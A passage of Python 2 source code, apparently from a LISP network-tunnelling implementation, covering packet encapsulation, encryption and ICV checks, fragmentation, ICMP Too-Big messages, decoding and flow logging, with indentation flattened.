#endif
self.udp_dport = self.encap_port
self.udp_length = len(self.packet) + 16
#
# IPv6 raw sockets need to have the UDP ports not swapped.
#
if (self.outer_version == 4):
sport = socket.htons(self.udp_sport)
dport = socket.htons(self.udp_dport)
else:
sport = self.udp_sport
dport = self.udp_dport
#endif
udp = struct.pack("HHHH", sport, dport, socket.htons(self.udp_length),
self.udp_checksum)
#
# Encode the LISP header.
#
lisp = self.lisp_header.encode()
#
# Now prepend all 3 headers, LISP, UDP, outer header. See lisp_packet.
# fix_outer_header() for byte-swap details for the frag-offset field.
#
if (self.outer_version == 4):
tl = socket.htons(self.udp_length + 20)
frag = socket.htons(0x4000)
outer = struct.pack("BBHHHBBH", 0x45, self.outer_tos, tl, 0xdfdf,
frag, self.outer_ttl, 17, 0)
outer += self.outer_source.pack_address()
outer += self.outer_dest.pack_address()
outer = lisp_ip_checksum(outer)
elif (self.outer_version == 6):
outer = ""
# short = 6 << 12
# short |= self.outer_tos << 4
# short = socket.htons(short)
# tl = socket.htons(self.udp_length)
# outer = struct.pack("HHHBB", short, 0, tl, 17, self.outer_ttl)
# outer += self.outer_source.pack_address()
# outer += self.outer_dest.pack_address()
else:
return(None)
#endif
self.packet = outer + udp + lisp + self.packet
return(self)
#enddef
def cipher_pad(self, packet):
length = len(packet)
if ((length % 16) != 0):
pad = ((length/16) + 1) * 16
packet = packet.ljust(pad)
#endif
return(packet)
#enddef
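#
# cipher_pad() example (illustrative): a 50-byte packet is space-padded
# by ljust() to the next 16-byte boundary, 64 bytes, since the AES
# ciphers require the plaintext length to be a multiple of 16 bytes.
#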
def encrypt(self, key, addr_str):
if (key == None or key.shared_key == None):
return([self.packet, False])
#endif
#
# Pad packet to multiple of 16 bytes and call AES cipher.
#
packet = self.cipher_pad(self.packet)
iv = key.get_iv()
ts = lisp_get_timestamp()
aead = None
if (key.cipher_suite == LISP_CS_25519_CHACHA):
encrypt = chacha.ChaCha(key.encrypt_key, iv).encrypt
elif (key.cipher_suite == LISP_CS_25519_GCM):
k = binascii.unhexlify(key.encrypt_key)
try:
aesgcm = AES.new(k, AES.MODE_GCM, iv)
encrypt = aesgcm.encrypt
aead = aesgcm.digest
except:
lprint("You need AES-GCM, do a 'pip install pycryptodome'")
return([self.packet, False])
#endtry
else:
k = binascii.unhexlify(key.encrypt_key)
encrypt = AES.new(k, AES.MODE_CBC, iv).encrypt
#endif
ciphertext = encrypt(packet)
if (ciphertext == None): return([self.packet, False])
ts = int(str(time.time() - ts).split(".")[1][0:6])
#
# GCM requires 16 bytes of an AEAD MAC tag at the end of the
# ciphertext. Needed to interoperate with the Go implemenation of
# AES-GCM. The MAC digest was computed above.
#
if (aead != None): ciphertext += aead()
#
# Compute ICV and append to packet. ICV covers the LISP header, the
# IV, and the ciphertext.
#
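#
# The encrypted payload returned below is laid out as:
#
#   [ IV (8, 12, or 16 bytes) | ciphertext | ICV (16 or 20 bytes) ]
#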
self.lisp_header.key_id(key.key_id)
lisp = self.lisp_header.encode()
icv = key.do_icv(lisp + iv + ciphertext, iv)
ps = 4 if (key.do_poly) else 8
string = bold("Encrypt", False)
cipher_str = bold(key.cipher_suite_string, False)
addr_str = "RLOC: " + red(addr_str, False)
auth = "poly" if key.do_poly else "sha256"
auth = bold(auth, False)
icv_str = "ICV({}): 0x{}...{}".format(auth, icv[0:ps], icv[-ps::])
dprint("{} for key-id: {}, {}, {}, {}-time: {} usec".format( \
string, key.key_id, addr_str, icv_str, cipher_str, ts))
icv = int(icv, 16)
if (key.do_poly):
icv1 = byte_swap_64((icv >> 64) & LISP_8_64_MASK)
icv2 = byte_swap_64(icv & LISP_8_64_MASK)
icv = struct.pack("QQ", icv1, icv2)
else:
icv1 = byte_swap_64((icv >> 96) & LISP_8_64_MASK)
icv2 = byte_swap_64((icv >> 32) & LISP_8_64_MASK)
icv3 = socket.htonl(icv & 0xffffffff)
icv = struct.pack("QQI", icv1, icv2, icv3)
#endif
return([iv + ciphertext + icv, True])
#enddef
def decrypt(self, packet, header_length, key, addr_str):
#
# Do ICV first. If it succeeds, then decrypt. Get ICV from packet and
# truncate packet to run hash over. Compare packet hash with computed
# hash.
#
if (key.do_poly):
icv1, icv2 = struct.unpack("QQ", packet[-16::])
packet_icv = byte_swap_64(icv1) << 64
packet_icv |= byte_swap_64(icv2)
packet_icv = lisp_hex_string(packet_icv).zfill(32)
packet = packet[0:-16]
ps = 4
hash_str = bold("poly", False)
else:
icv1, icv2, icv3 = struct.unpack("QQI", packet[-20::])
packet_icv = byte_swap_64(icv1) << 96
packet_icv |= byte_swap_64(icv2) << 32
packet_icv |= socket.htonl(icv3)
packet_icv = lisp_hex_string(packet_icv).zfill(40)
packet = packet[0:-20]
ps = 8
hash_str = bold("sha", False)
#endif
lisp = self.lisp_header.encode()
#
# Get the IV and use it to decrypt and authenticate.
#
if (key.cipher_suite == LISP_CS_25519_CHACHA):
iv_len = 8
cipher_str = bold("chacha", False)
elif (key.cipher_suite == LISP_CS_25519_GCM):
iv_len = 12
cipher_str = bold("aes-gcm", False)
else:
iv_len = 16
cipher_str = bold("aes-cbc", False)
#endif
iv = packet[0:iv_len]
#
# Compute ICV over LISP header and packet payload.
#
computed_icv = key.do_icv(lisp + packet, iv)
p_icv = "0x{}...{}".format(packet_icv[0:ps], packet_icv[-ps::])
c_icv = "0x{}...{}".format(computed_icv[0:ps], computed_icv[-ps::])
if (computed_icv != packet_icv):
self.packet_error = "ICV-error"
funcs = cipher_str + "/" + hash_str
fail = bold("ICV failed ({})".format(funcs), False)
icv_str = "packet-ICV {} != computed-ICV {}".format(p_icv, c_icv)
dprint(("{} from RLOC {}, receive-port: {}, key-id: {}, " + \
"packet dropped, {}").format(fail, red(addr_str, False),
self.udp_sport, key.key_id, icv_str))
dprint("{}".format(key.print_keys()))
#
# This is the 4-tuple NAT case. There another addr:port that
# should have the crypto-key the encapsulator is using. This is
# typically done on the RTR.
#
lisp_retry_decap_keys(addr_str, lisp + packet, iv, packet_icv)
return([None, False])
#endif
#
# Advance over IV for decryption.
#
packet = packet[iv_len::]
#
# Call AES or chacha cipher. For AES-CBC, make sure the ciphertext
# length is a multiple of 16 bytes before decrypting.
#
ts = lisp_get_timestamp()
if (key.cipher_suite == LISP_CS_25519_CHACHA):
decrypt = chacha.ChaCha(key.encrypt_key, iv).decrypt
elif (key.cipher_suite == LISP_CS_25519_GCM):
k = binascii.unhexlify(key.encrypt_key)
try:
decrypt = AES.new(k, AES.MODE_GCM, iv).decrypt
except:
self.packet_error = "no-decrypt-key"
lprint("You need AES-GCM, do a 'pip install pycryptodome'")
return([None, False])
#endtry
else:
if ((len(packet) % 16) != 0):
dprint("Ciphertext not multiple of 16 bytes, packet dropped")
return([None, False])
#endif
k = binascii.unhexlify(key.encrypt_key)
decrypt = AES.new(k, AES.MODE_CBC, iv).decrypt
#endif
plaintext = decrypt(packet)
ts = int(str(time.time() - ts).split(".")[1][0:6])
#
# Decryption succeeded. Log it and return the plaintext payload.
#
string = bold("Decrypt", False)
addr_str = "RLOC: " + red(addr_str, False)
auth = "poly" if key.do_poly else "sha256"
auth = bold(auth, False)
icv_str = "ICV({}): {}".format(auth, p_icv)
dprint("{} for key-id: {}, {}, {} (good), {}-time: {} usec". \
format(string, key.key_id, addr_str, icv_str, cipher_str, ts))
#
# Keep self.packet the outer header, UDP header, and LISP header.
# We will append the plaintext in the caller once we parse the inner
# packet length so we can truncate any padding the encryptor put on.
#
self.packet = self.packet[0:header_length]
return([plaintext, True])
#enddef
def fragment_outer(self, outer_hdr, inner_packet):
frag_len = 1000
#
# Break up packet payload in fragments and put in array to have
# IP header added in next loop below.
#
frags = []
offset = 0
length = len(inner_packet)
while (offset < length):
frag = inner_packet[offset::]
if (len(frag) > frag_len): frag = frag[0:frag_len]
frags.append(frag)
offset += len(frag)
#endwhile
#
# Now fix outer IPv4 header with fragment-offset values and add the
# IPv4 value.
#
fragments = []
offset = 0
for frag in frags:
#
# Set frag-offset field in outer IPv4 header.
#
fo = offset if (frag == frags[-1]) else 0x2000 + offset
fo = socket.htons(fo)
outer_hdr = outer_hdr[0:6] + struct.pack("H", fo) + outer_hdr[8::]
#
# Set total-length field in outer IPv4 header and checksum.
#
l = socket.htons(len(frag) + 20)
outer_hdr = outer_hdr[0:2] + struct.pack("H", l) + outer_hdr[4::]
outer_hdr = lisp_ip_checksum(outer_hdr)
fragments.append(outer_hdr + frag)
offset += len(frag) / 8
#endfor
return(fragments)
#enddef
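#
# fragment_outer() example (illustrative): a 2400-byte inner payload
# yields fragments of 1000, 1000, and 400 bytes. The first two carry
# frag-offsets 0 and 125 with the MF bit (0x2000) set; the last carries
# offset 250 with MF clear (offsets are in units of 8 bytes).
#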
def send_icmp_too_big(self, inner_packet):
global lisp_last_icmp_too_big_sent
global lisp_icmp_raw_socket
elapsed = time.time() - lisp_last_icmp_too_big_sent
if (elapsed < LISP_ICMP_TOO_BIG_RATE_LIMIT):
lprint("Rate limit sending ICMP Too-Big to {}".format( \
self.inner_source.print_address_no_iid()))
return(False)
#endif
#
# Destination Unreachable Message - Too Big Message
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 3 | Code = 4 | Checksum |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | unused | MTU = 1400 |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Internet Header + 64 bits of Original Data Datagram |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
mtu = socket.htons(1400)
icmp = struct.pack("BBHHH", 3, 4, 0, 0, mtu)
icmp += inner_packet[0:20+8]
icmp = lisp_icmp_checksum(icmp)
#
# Build IP header. Make source of ICMP invoking packet the destination
# and our address the source. Our address was saved when we attempted
# to encap, so lisp_packet.outer_source holds the RLOC address of
# this system.
#
host = inner_packet[12:16]
dest = self.inner_source.print_address_no_iid()
me = self.outer_source.pack_address()
#
# IP_HDRINCL requires the total-length and frag-offset fields to be
# host byte order. We need to build the total-length field just like
# lisp_packet.encode(), checksum, and then fix outer header. So that
# logic is semantically replicated here. Same logic is in lisp_packet.
# fragment() as well.
#
tl = socket.htons(20+36)
ip = struct.pack("BBHHHBBH", 0x45, 0, tl, 0, 0, 32, 1, 0) + me + host
ip = lisp_ip_checksum(ip)
ip = self.fix_outer_header(ip)
ip += icmp
tb = bold("Too-Big", False)
lprint("Send ICMP {} to {}, mtu 1400: {}".format(tb, dest,
lisp_format_packet(ip)))
try:
lisp_icmp_raw_socket.sendto(ip, (dest, 0))
except socket.error, e:
lprint("lisp_icmp_raw_socket.sendto() failed: {}".format(e))
return(False)
#endtry
#
# Caller function sends packet on raw socket. Kernel routes out
# interface to destination.
#
lisp_last_icmp_too_big_sent = lisp_get_timestamp()
return(True)
#enddef
def fragment(self):
global lisp_icmp_raw_socket
global lisp_ignore_df_bit
packet = self.fix_outer_header(self.packet)
#
# If inner header is IPv4, we will fragment the inner header and encap
# each fragment. If the inner header is IPv6, we will not add the
# Fragmentation Header into the inner IPv6 packet.
#
length = len(packet)
if (length <= 1500): return([packet], "Fragment-None")
packet = self.packet
#
# Fragment outer IPv4 header if inner packet is IPv6 (or Mac frame).
# We cannot fragment IPv6 packet since we are not the source.
#
if (self.inner_version != 4):
ident = random.randint(0, 0xffff)
outer_hdr = packet[0:4] + struct.pack("H", ident) + packet[6:20]
inner_packet = packet[20::]
fragments = self.fragment_outer(outer_hdr, inner_packet)
return(fragments, "Fragment-Outer")
#endif
#
# Fragment inner IPv4 packet.
#
outer_hdr_len = 56 if (self.outer_version == 6) else 36
outer_hdr = packet[0:outer_hdr_len]
inner_hdr = packet[outer_hdr_len: outer_hdr_len + 20]
inner_packet = packet[outer_hdr_len + 20::]
#
# If DF-bit is set, don't fragment packet. Do MTU discovery if
# configured with env variable.
#
frag_field = struct.unpack("H", inner_hdr[6:8])[0]
frag_field = socket.ntohs(frag_field)
if (frag_field & 0x4000):
if (lisp_icmp_raw_socket != None):
inner = packet[outer_hdr_len::]
if (self.send_icmp_too_big(inner)): return([], None)
#endif
if (lisp_ignore_df_bit):
frag_field &= ~0x4000
else:
df_bit = bold("DF-bit set", False)
dprint("{} in inner header, packet discarded".format(df_bit))
return([], "Fragment-None-DF-bit")
#endif
#endif
offset = 0
length = len(inner_packet)
fragments = []
while (offset < length):
fragments.append(inner_packet[offset:offset+1400])
offset += 1400
#endwhile
#
# Now put inner header and outer header on each fragment.
#
frags = fragments
fragments = []
mf = True if frag_field & 0x2000 else False
frag_field = (frag_field & 0x1fff) * 8
for frag in frags:
#
# Set fragment-offset and MF bit if not last fragment.
#
ff = frag_field / 8
if (mf):
ff |= 0x2000
elif (frag != frags[-1]):
ff |= 0x2000
#endif
ff = socket.htons(ff)
inner_hdr = inner_hdr[0:6] + struct.pack("H", ff) + inner_hdr[8::]
#
# Set length of fragment, set up offset for next fragment-offset,
# and header checksum fragment packet. Then prepend inner header
# to payload.
#
length = len(frag)
frag_field += length
l = socket.htons(length + 20)
inner_hdr = inner_hdr[0:2] + struct.pack("H", l) + \
inner_hdr[4:10] + struct.pack("H", 0) + inner_hdr[12::]
inner_hdr = lisp_ip_checksum(inner_hdr)
fragment = inner_hdr + frag
#
# Change outer header length and header checksum if IPv4 outer
# header. If IPv6 outer header, raw sockets prepends the header.
#
length = len(fragment)
if (self.outer_version == 4):
l = length + outer_hdr_len
length += 16
outer_hdr = outer_hdr[0:2] + struct.pack("H", l) + \
outer_hdr[4::]
outer_hdr = lisp_ip_checksum(outer_hdr)
fragment = outer_hdr + fragment
fragment = self.fix_outer_header(fragment)
#endif
#
# Finally fix outer UDP header length. Byte-swap it.
#
udp_len_index = outer_hdr_len - 12
l = socket.htons(length)
fragment = fragment[0:udp_len_index] + struct.pack("H", l) + \
fragment[udp_len_index+2::]
fragments.append(fragment)
#endfor
return(fragments, "Fragment-Inner")
#enddef
def fix_outer_header(self, packet):
#
# IP_HDRINCL requires the total-length and frag-offset fields to be
# in host byte order, so they have to be byte-swapped here. But in
# testing, we (UPC guys) discovered the frag field didn't need
# swapping. The conclusion is that byte-swapping is necessary for
# MacOS but not for Linux.
#
if (self.outer_version == 4 or self.inner_version == 4):
if (lisp_is_macos()):
packet = packet[0:2] + packet[3] + packet[2] + packet[4:6] + \
packet[7] + packet[6] + packet[8::]
else:
packet = packet[0:2] + packet[3] + packet[2] + packet[4::]
#endif
#endif
return(packet)
#enddef
def send_packet(self, lisp_raw_socket, dest):
if (lisp_flow_logging and dest != self.inner_dest): self.log_flow(True)
dest = dest.print_address_no_iid()
fragments, in_or_out = self.fragment()
for fragment in fragments:
if (len(fragments) != 1):
self.packet = fragment
self.print_packet(in_or_out, True)
#endif
try: lisp_raw_socket.sendto(fragment, (dest, 0))
except socket.error, e:
lprint("socket.sendto() failed: {}".format(e))
#endtry
#endfor
#enddef
def send_l2_packet(self, l2_socket, mac_header):
if (l2_socket == None):
lprint("No layer-2 socket, drop IPv6 packet")
return
#endif
if (mac_header == None):
lprint("Could not build MAC header, drop IPv6 packet")
return
#endif
packet = mac_header + self.packet
# try: l2_socket.send(packet)
# except socket.error, e:
# lprint("send_l2_packet(): socket.send() failed: {}".format(e))
# #endtry
# return
#
# Use tuntap tunnel interface instead of raw sockets for IPv6
# decapsulated packets.
#
l2_socket.write(packet)
return
#enddef
def bridge_l2_packet(self, eid, db):
try: dyn_eid = db.dynamic_eids[eid.print_address_no_iid()]
except: return
try: interface = lisp_myinterfaces[dyn_eid.interface]
except: return
try:
socket = interface.get_bridge_socket()
if (socket == None): return
except: return
try: socket.send(self.packet)
except socket.error, e:
lprint("bridge_l2_packet(): socket.send() failed: {}".format(e))
#endtry
#enddef
def is_lisp_packet(self, packet):
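#
# This assumes an IPv4 outer header with no options: byte 9 is the
# protocol field and the UDP header starts at offset 20, so bytes
# 20-21 and 22-23 are the UDP source and dest ports.
#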
udp = (struct.unpack("B", packet[9])[0] == LISP_UDP_PROTOCOL)
if (udp == False): return(False)
port = struct.unpack("H", packet[22:24])[0]
if (socket.ntohs(port) == LISP_DATA_PORT): return(True)
port = struct.unpack("H", packet[20:22])[0]
if (socket.ntohs(port) == LISP_DATA_PORT): return(True)
return(False)
#enddef
def decode(self, is_lisp_packet, lisp_ipc_socket, stats):
self.packet_error = ""
packet = self.packet
orig_len = len(packet)
L3 = L2 = True
#
# Get version number of outer header so we can decode outer addresses.
#
header_len = 0
iid = 0
if (is_lisp_packet):
iid = self.lisp_header.get_instance_id()
version = struct.unpack("B", packet[0:1])[0]
self.outer_version = version >> 4
if (self.outer_version == 4):
#
# MacOS is zeroing the IP header checksum for a raw socket.
# If we receive this, bypass the checksum calculation.
#
orig_checksum = struct.unpack("H", packet[10:12])[0]
packet = lisp_ip_checksum(packet)
checksum = struct.unpack("H", packet[10:12])[0]
if (checksum != 0):
if (orig_checksum != 0 or lisp_is_macos() == False):
self.packet_error = "checksum-error"
if (stats):
stats[self.packet_error].increment(orig_len)
#endif
lprint("IPv4 header checksum failed for outer header")
if (lisp_flow_logging): self.log_flow(False)
return(None)
#endif
#endif
afi = LISP_AFI_IPV4
offset = 12
self.outer_tos = struct.unpack("B", packet[1:2])[0]
self.outer_ttl = struct.unpack("B", packet[8:9])[0]
header_len = 20
elif (self.outer_version == 6):
afi = LISP_AFI_IPV6
offset = 8
tos = struct.unpack("H", packet[0:2])[0]
self.outer_tos = (socket.ntohs(tos) >> 4) & 0xff
self.outer_ttl = struct.unpack("B", packet[7:8])[0]
header_len = 40
else:
self.packet_error = "outer-header-error"
if (stats): stats[self.packet_error].increment(orig_len)
lprint("Cannot decode outer header")
return(None)
#endif
self.outer_source.afi = afi
self.outer_dest.afi = afi
addr_length = self.outer_source.addr_length()
self.outer_source.unpack_address(packet[offset:offset+addr_length])
offset += addr_length
self.outer_dest.unpack_address(packet[offset:offset+addr_length])
packet = packet[header_len::]
self.outer_source.mask_len = self.outer_source.host_mask_len()
self.outer_dest.mask_len = self.outer_dest.host_mask_len()
#
# Get UDP fields
#
short = struct.unpack("H", packet[0:2])[0]
self.udp_sport = socket.ntohs(short)
short = struct.unpack("H", packet[2:4])[0]
self.udp_dport = socket.ntohs(short)
short = struct.unpack("H", packet[4:6])[0]
self.udp_length = socket.ntohs(short)
short = struct.unpack("H", packet[6:8])[0]
self.udp_checksum = socket.ntohs(short)
packet = packet[8::]
#
# Determine what is inside, a packet or a frame.
#
L3 = (self.udp_dport == LISP_DATA_PORT or
self.udp_sport == LISP_DATA_PORT)
L2 = (self.udp_dport in (LISP_L2_DATA_PORT, LISP_VXLAN_DATA_PORT))
#
# Get LISP header fields.
#
if (self.lisp_header.decode(packet) == False):
self.packet_error = "lisp-header-error"
if (stats): stats[self.packet_error].increment(orig_len)
if (lisp_flow_logging): self.log_flow(False)
lprint("Cannot decode LISP header")
return(None)
#endif
packet = packet[8::]
iid = self.lisp_header.get_instance_id()
header_len += 16
#endif
if (iid == 0xffffff): iid = 0
#
# Time to decrypt if K-bits set.
#
decrypted = False
key_id = self.lisp_header.k_bits
if (key_id):
addr_str = lisp_get_crypto_decap_lookup_key(self.outer_source,
self.udp_sport)
if (addr_str == None):
self.packet_error = "no-decrypt-key"
if (stats): stats[self.packet_error].increment(orig_len)
self.print_packet("Receive", is_lisp_packet)
ks = bold("No key available", False)
dprint("{} for key-id {} to decrypt packet".format(ks, key_id))
if (lisp_flow_logging): self.log_flow(False)
return(None)
#endif
key = lisp_crypto_keys_by_rloc_decap[addr_str][key_id]
if (key == None):
self.packet_error = "no-decrypt-key"
if (stats): stats[self.packet_error].increment(orig_len)
self.print_packet("Receive", is_lisp_packet)
ks = bold("No key available", False)
dprint("{} to decrypt packet from RLOC {}".format(ks,
red(addr_str, False)))
if (lisp_flow_logging): self.log_flow(False)
return(None)
#endif
#
# Decrypt and continue processing inner header.
#
key.use_count += 1
packet, decrypted = self.decrypt(packet, header_len, key,
addr_str)
if (decrypted == False):
if (stats): stats[self.packet_error].increment(orig_len)
if (lisp_flow_logging): self.log_flow(False)
return(None)
#endif
#endif
#
# Get inner header fields.
#
version = struct.unpack("B", packet[0:1])[0]
self.inner_version = version >> 4
if (L3 and self.inner_version == 4 and version >= 0x45):
packet_len = socket.ntohs(struct.unpack("H", packet[2:4])[0])
self.inner_tos = struct.unpack("B", packet[1:2])[0]
self.inner_ttl = struct.unpack("B", packet[8:9])[0]
self.inner_protocol = struct.unpack("B", packet[9:10])[0]
self.inner_source.afi = LISP_AFI_IPV4
self.inner_dest.afi = LISP_AFI_IPV4
self.inner_source.unpack_address(packet[12:16])
self.inner_dest.unpack_address(packet[16:20])
frag_field = socket.ntohs(struct.unpack("H", packet[6:8])[0])
self.inner_is_fragment = (frag_field & 0x2000 or (frag_field & 0x1fff) != 0)
if (self.inner_protocol == LISP_UDP_PROTOCOL):
self.inner_sport = struct.unpack("H", packet[20:22])[0]
self.inner_sport = socket.ntohs(self.inner_sport)
self.inner_dport = struct.unpack("H", packet[22:24])[0]
self.inner_dport = socket.ntohs(self.inner_dport)
#endif
elif (L3 and self.inner_version == 6 and version >= 0x60):
packet_len = socket.ntohs(struct.unpack("H", packet[4:6])[0]) + 40
tos = struct.unpack("H", packet[0:2])[0]
self.inner_tos = (socket.ntohs(tos) >> 4) & 0xff
self.inner_ttl = struct.unpack("B", packet[7:8])[0]
self.inner_protocol = struct.unpack("B", packet[6:7])[0]
self.inner_source.afi = LISP_AFI_IPV6
self.inner_dest.afi = LISP_AFI_IPV6
self.inner_source.unpack_address(packet[8:24])
self.inner_dest.unpack_address(packet[24:40])
if (self.inner_protocol == LISP_UDP_PROTOCOL):
self.inner_sport = struct.unpack("H", packet[40:42])[0]
self.inner_sport = socket.ntohs(self.inner_sport)
self.inner_dport = struct.unpack("H", packet[42:44])[0]
self.inner_dport = socket.ntohs(self.inner_dport)
#endif
elif (L2):
packet_len = len(packet)
self.inner_tos = 0
self.inner_ttl = 0
self.inner_protocol = 0
self.inner_source.afi = LISP_AFI_MAC
self.inner_dest.afi = LISP_AFI_MAC
self.inner_dest.unpack_address(self.swap_mac(packet[0:6]))
self.inner_source.unpack_address(self.swap_mac(packet[6:12]))
elif (self.lisp_header.get_instance_id() == 0xffffff):
if (lisp_flow_logging): self.log_flow(False)
return(self)
else:
self.packet_error = "bad-inner-version"
if (stats): stats[self.packet_error].increment(orig_len)
lprint("Cannot decode encapsulation, header version {}".format(\
hex(version)))
packet = lisp_format_packet(packet[0:20])
lprint("Packet header: {}".format(packet))
if (lisp_flow_logging and is_lisp_packet): self.log_flow(False)
return(None)
#endif
self.inner_source.mask_len = self.inner_source.host_mask_len()
self.inner_dest.mask_len = self.inner_dest.host_mask_len()
self.inner_source.instance_id = iid
self.inner_dest.instance_id = iid
#
# If we are configured to do Nonce-Echoing, do lookup on source-EID
# to obtain source RLOC to store nonce to echo.
#
if (lisp_nonce_echoing and is_lisp_packet):
echo_nonce = lisp_get_echo_nonce(self.outer_source, None)
if (echo_nonce == None):
rloc_str = self.outer_source.print_address_no_iid()
echo_nonce = lisp_echo_nonce(rloc_str)
#endif
nonce = self.lisp_header.get_nonce()
if (self.lisp_header.is_e_bit_set()):
echo_nonce.receive_request(lisp_ipc_socket, nonce)
elif (echo_nonce.request_nonce_sent):
echo_nonce.receive_echo(lisp_ipc_socket, nonce)
#endif
#endif
#
# If we decrypted, we may have to truncate packet if the encrypter
# padded the packet.
#
if (decrypted): self.packet += packet[:packet_len]
#
# Log a packet that was parsed correctly.
#
if (lisp_flow_logging and is_lisp_packet): self.log_flow(False)
return(self)
#enddef
def swap_mac(self, mac):
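#
# A MAC address is handled as three 16-bit words with the bytes of each
# word swapped, so swap each adjacent byte pair: bytes 0,1 -> 1,0, etc.
#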
return(mac[1] + mac[0] + mac[3] + mac[2] + mac[5] + mac[4])
#enddef
def strip_outer_headers(self):
offset = 16
offset += 20 if (self.outer_version == 4) else 40
self.packet = self.packet[offset::]
return(self)
#enddef
def hash_ports(self):
packet = self.packet
version = self.inner_version
hashval = 0
if (version == 4):
protocol = struct.unpack("B", packet[9])[0]
if (self.inner_is_fragment): return(protocol)
if (protocol in [6, 17]):
hashval = protocol
hashval += struct.unpack("I", packet[20:24])[0]
hashval = (hashval >> 16) ^ (hashval & 0xffff)
#endif
#endif
if (version == 6):
protocol = struct.unpack("B", packet[6])[0]
if (protocol in [6, 17]):
hashval = protocol
hashval += struct.unpack("I", packet[40:44])[0]
hashval = (hashval >> 16) ^ (hashval & 0xffff)
#endif
#endif
return(hashval)
#enddef
def hash_packet(self):
hashval = self.inner_source.address ^ self.inner_dest.address
hashval += self.hash_ports()
if (self.inner_version == 4):
hashval = (hashval >> 16) ^ (hashval & 0xffff)
elif (self.inner_version == 6):
hashval = (hashval >> 64) ^ (hashval & 0xffffffffffffffff)
hashval = (hashval >> 32) ^ (hashval & 0xffffffff)
hashval = (hashval >> 16) ^ (hashval & 0xffff)
#endif
self.udp_sport = 0xf000 | (hashval & 0xfff)
#enddef
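#
# hash_packet() keeps the low-order 12 bits of the fold, so the encap
# source port always falls in 0xf000-0xffff; for example, a fold value
# of 0x1234 yields source port 0xf234.
#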
def print_packet(self, s_or_r, is_lisp_packet):
if (is_lisp_packet == False):
iaddr_str = "{} -> {}".format(self.inner_source.print_address(),
self.inner_dest.print_address())
dprint(("{} {}, tos/ttl: {}/{}, length: {}, packet: {} ..."). \
format(bold(s_or_r, False),
green(iaddr_str, False), self.inner_tos,
self.inner_ttl, len(self.packet),
lisp_format_packet(self.packet[0:60])))
return
#endif
if (s_or_r.find("Receive") != -1):
ed = "decap"
ed += "-vxlan" if self.udp_dport == LISP_VXLAN_DATA_PORT else ""
else:
ed = s_or_r
if (ed in ["Send", "Replicate"] or ed.find("Fragment") != -1):
ed = "encap"
#endif
#endif
oaddr_str = "{} -> {}".format(self.outer_source.print_address_no_iid(),
self.outer_dest.print_address_no_iid())
#
# Special case where Info-Request is inside of a 4341 packet for
# NAT-traversal.
#
if (self.lisp_header.get_instance_id() == 0xffffff):
line = ("{} LISP packet, outer RLOCs: {}, outer tos/ttl: " + \
"{}/{}, outer UDP: {} -> {}, ")
line += bold("control-packet", False) + ": {} ..."
dprint(line.format(bold(s_or_r, False), red(oaddr_str, False),
self.outer_tos, self.outer_ttl, self.udp_sport,
self.udp_dport, lisp_format_packet(self.packet[0:56])))
return
else:
line = ("{} LISP packet, outer RLOCs: {}, outer tos/ttl: " + \
"{}/{}, outer UDP: {} -> {}, inner EIDs: {}, " + \
"inner tos/ttl: {}/{}, length: {}, {}, packet: {} ...")
#endif
if (self.lisp_header.k_bits):
if (ed == "encap"): ed = "encrypt/encap"
if (ed == "decap"): ed = "decap/decrypt"
#endif
iaddr_str = "{} -> {}".format(self.inner_source.print_address(),
self.inner_dest.print_address())
dprint(line.format(bold(s_or_r, False), red(oaddr_str, False),
self.outer_tos, self.outer_ttl, self.udp_sport, self.udp_dport,
green(iaddr_str, False), self.inner_tos, self.inner_ttl,
len(self.packet), self.lisp_header.print_header(ed),
lisp_format_packet(self.packet[0:56])))
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.inner_source, self.inner_dest))
#enddef
def get_raw_socket(self):
iid = str(self.lisp_header.get_instance_id())
if (iid == "0"): return(None)
if (lisp_iid_to_interface.has_key(iid) == False): return(None)
interface = lisp_iid_to_interface[iid]
s = interface.get_socket()
if (s == None):
string = bold("SO_BINDTODEVICE", False)
enforce = (os.getenv("LISP_ENFORCE_BINDTODEVICE") != None)
lprint("{} required for multi-tenancy support, {} packet".format( \
string, "drop" if enforce else "forward"))
if (enforce): return(None)
#endif
iid = bold(iid, False)
d = bold(interface.device, False)
dprint("Send packet on instance-id {} interface {}".format(iid, d))
return(s)
#enddef
def log_flow(self, encap):
global lisp_flow_log
dump = os.path.exists("./log-flows")
if (len(lisp_flow_log) == LISP_FLOW_LOG_SIZE or dump):
args = [lisp_flow_log]
lisp_flow_log = []
threading.Thread(target=lisp_write_flow_log, args=args).start()
if (dump): os.system("rm ./log-flows")
return
#endif
ts = datetime.datetime.now()
lisp_flow_log.append([ts, encap, self.packet, self])
#enddef
def print_flow(self, ts, encap, packet):
ts = ts.strftime("%m/%d/%y %H:%M:%S.%f")[:-3]
flow = "{}: {}".format(ts, "encap" if encap else "decap")
osrc = red(self.outer_source.print_address_no_iid(), False)
odst = red(self.outer_dest.print_address_no_iid(), False)
isrc = green(self.inner_source.print_address(), False)
idst = green(self.inner_dest.print_address(), False)
if (self.lisp_header.get_instance_id() == 0xffffff):
flow += " {}:{} -> {}:{}, LISP control message type {}\n"
flow = flow.format(osrc, self.udp_sport, odst, self.udp_dport,
self.inner_version)
return(flow)
#endif
if (self.outer_dest.is_null() == False):
flow += " {}:{} -> {}:{}, len/tos/ttl {}/{}/{}"
flow = flow.format(osrc, self.udp_sport, odst, self.udp_dport,
len(packet), self.outer_tos, self.outer_ttl)
#endif
#
# Can't look at inner header if encrypted. Protecting user privacy.
#
if (self.lisp_header.k_bits != 0):
error = "\n"
if (self.packet_error != ""):
error = " ({})".format(self.packet_error) + error
#endif
flow += ", encrypted" + error
return(flow)
#endif
#
# Position to inner header.
#
if (self.outer_dest.is_null() == False):
packet = packet[36::] if self.outer_version == 4 else packet[56::]
#endif
protocol = packet[9] if self.inner_version == 4 else packet[6]
protocol = struct.unpack("B", protocol)[0]
